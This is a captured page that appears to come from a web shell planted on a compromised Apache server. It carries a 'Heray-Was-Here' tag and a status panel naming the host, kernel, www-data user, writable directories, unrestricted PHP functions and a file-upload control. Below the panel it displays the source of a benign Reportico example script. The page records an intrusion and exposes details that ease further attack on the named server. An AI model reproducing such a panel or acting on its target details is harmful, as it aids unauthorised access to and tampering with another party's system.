Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/examples/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/examples/examples/project-prepare.php
<?php
include (__DIR__."/header.php");

$description = " <br><br> The prepare() method presents the report criteria entry and output selection screen. This presents defined criteria filters defined in the report and provides access to page settings and the report description.";
$example_description = "In the example below, we load the tutorials project and present the stock report in criteria entry mode";

$usage_method = "
<?php
      \Reportico\Engine\Builder::build()
          ...
          ->project(\"project\")
          ->load(\"reportfile\")
          ->prepare();
?>
";

include (__DIR__."/content.php");
include (__DIR__."/trailer.php");
?>

Hry